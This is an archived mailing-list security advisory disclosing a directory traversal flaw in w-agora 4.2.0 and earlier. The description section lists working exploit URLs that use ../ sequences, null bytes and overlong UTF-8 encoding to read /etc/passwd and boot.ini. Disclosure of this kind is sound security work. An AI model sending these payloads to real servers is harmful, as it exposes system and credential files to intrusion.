w-agora 4.2.0 and prior Remote Directory Travel Vulnerability

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



w-agora 4.2.0 and prior Remote Directory Travel Vulnerability 

SEVERITY: 
========= 
High 

SOFTWARE: 
========= 
w-agora 4.2.0 

http://w-agora.net 

INFO: 
===== 
w-agora is a web publishing and forum software. It allows you and your visitors to store and display messages, files, share 

discussions and other information on your web site. 

DESCRIPTION: 
============ 
W-agora 4.2.0 and earlier are vulnerable to a remote directory travel bug. 

Here are some examples: 

http://localhost/w-agora/index.php?site=../../../../../../../../boot.ini%00 

http://localhost/w-agora/index.php?site=../../../../../../../../etc/passwd%00 


http://localhost/w-agora/index.php?site=../../../../../../../../etc/passwd 

http://localhost/w-agora/index.php?site=%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae% 

c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini 

http://localhost/w-agora/index.php?site=../../../../../../../../boot.ini 



A proof of concept video supporting this issue can be downloaded from here - 

http://rapidshare.de/files/4106113/probe.rar.html 

VENDOR STATUS 
============= 
Vendor was contacted but no response received till date. 

CREDITS: 
======== 
This vulnerability was discovered and researched by - 

matrix_killer of h4cky0u Security Forums. 


mail : matrix_k at abv.bg 

web : http://www.h4cky0u.org 

Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!! 


ORIGINAL: 
========= 
http://h4cky0u.org/viewtopic.php?t=2097

[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux